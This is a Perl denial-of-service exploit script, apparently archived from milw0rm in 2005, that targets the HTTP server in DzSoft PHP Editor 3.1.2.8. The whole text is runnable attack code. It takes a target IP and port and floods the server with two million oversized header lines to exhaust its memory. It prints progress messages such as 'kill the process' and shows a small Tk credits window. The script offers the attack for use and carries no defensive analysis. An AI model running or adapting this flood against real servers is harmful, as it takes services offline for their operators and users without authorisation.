#!/usr/bin/perl # # DzSoft PHP Server DOS Exploit # ------------------------------------ # Infam0us Gr0up - Securiti Research # # # Tested on Windows2000 SP4 (Win NT) # Info: infamous.2hell.com # $subject = "DzSoft PHP Server DOS Exploit"; $vers = "DzSoft PHP Editor 3.1.2.8"; $vendor = "http://www.dzsoft.com"; $codz = "basher13 - basher13(at)linuxmail.org"; $ARGC=@ARGV; if ($ARGC !=2) { print "\n"; print " $subject\n"; print "------------------------------------\n\n"; print "Usage: $0 [remote IP] [port]\n"; print "Exam: $0 127.0.0.1 80\n"; exit; } use IO::Socket::INET; use Tk; $host=$ARGV[0]; $port=$ARGV[1]; print "\n"; print "-------------------------------------------------------\n"; print "[?] Version: libwww-perl-$LWP::VERSION\n"; print "[+] Connect to $host..\n"; $sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die "[-] Connection error$@\n"; print "[+] Connected\n"; print "[+] Bindmode for socket..\n"; sleep(1); binmode($sock); print "[+] Build buffer..\n"; $hostname="Host: $host"; $bufy='A'x50; $bufa='A'x8183; $len=length($bufy); $buff="GET / HTTP/1.1\r\n"; sleep(1); print "[+] Now kill the process..wait\n"; send($sock,$buff,0) || die "[-] send error:$@\n"; print "[+] Sending buffer..\n"; for($i= 0; $i < 2000000; $i++) { $buff=" $bufa\r\n"; send($sock,$buff,0) || die "[*] send error:$@, Check if server D0s'ed\n"; } $buff="$hostname\r\n"; $buff.="Content-Length: $len\r\n"; $buff.="\r\n"; $buff.=$bufy."\r\n\r\n"; send($sock,$buff,0) || die "[-] send error:$@\n"; print "[+] Server Out of Memory\n"; close($sock); print "-------------------------------------------------------\n"; my $mw = MainWindow->new(-title => 'INFO',); my $var; my $opt = $mw->Optionmenu( -options => [qw()], -command => sub { print "\n[>]: ", shift, "\n" }, -variable => \$var, )->pack; $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]); $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack; MainLoop; # milw0rm.com [2005-07-15]